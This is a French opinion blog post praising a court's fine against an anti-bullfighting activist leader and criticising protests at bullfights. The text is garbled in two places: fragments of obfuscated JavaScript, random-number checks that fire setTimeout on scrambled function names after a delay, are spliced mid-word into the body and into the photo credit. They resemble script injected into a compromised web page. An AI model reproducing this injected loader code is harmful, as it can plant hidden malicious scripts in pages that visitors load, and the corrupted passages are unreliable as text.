L’IMPUNITE ANTI-TAURINE

Il faut se réjouir de la condamnation du président du CRAC, Jean Pierre Garrigues, par le tribunal correctionnel de Dax, pour injures et outrage envers des aficionados en aôut dernier à Rion qu’il avait traités de “dégénérés” et de “pervers”. Cependant elle reste symbolique car la peine infligée de 300 euros d’amende et 700 euros de dommages et intérêts ne devrait pas trop bousculer les finances de ce monsieur ni de son organisation. Toutefois elle marque un précédent et d’autres comparutions devraient avoir lieu avec des peines qui pourraient être plus lourdes. Car l’impunité dans laquelle se déroulent les manifestations anti-taurines avec des insultes et des propos outranciers en présence de conjoints,  de copains, de la famille ou des enfants est intolérable dans un état de droit. Ces provocations n’ont d’autre objectif que de pouvoir filmer ou photographier les réactions des aficionados agressés pour détourner la réalité de leurs propres agressions. Elles n’ont pas atteint un autre de ses objectifs, celui de détourner les gens des arènes,  au contraire y aller est devenu un acte militant et revendicatif de la liberté d’expression et du respect des traditions. Par contre l’esprit festif en a un peu pâti, surtout dans les villages où les groupuscules anti-taurins se font plus remarquer que dans les grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes ferias où leur présence se révèle insignifiante. La mobilisation des anti a été forte, en nombre d’actions, à la fin de l’été dernier et en ce début de temporada, sans doute aussi pour faire pression sur les maires, mais leurs arguments n’ont pas du tout influencé la campagne aux municipales, preuve encore une fois qu’ils sont très minoritaires dans les régions taurines.Par contre il faudra se pencher sur les frais qu’engendrent leurs manifestations, comme le déplacement et l’hébergement de compagnies de CRS qui viennent parfois de loin jusque dans de petits villages comme Rion. Des dépenses assumées par la collectivité mais dont ils sont finalement responsables. Tout cela au détriment de notre droit d’assister, sans être menacés, à un spectacle autorisé.

anticorr01photo Bertrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Caritey

 

Les commentaires sont fermés.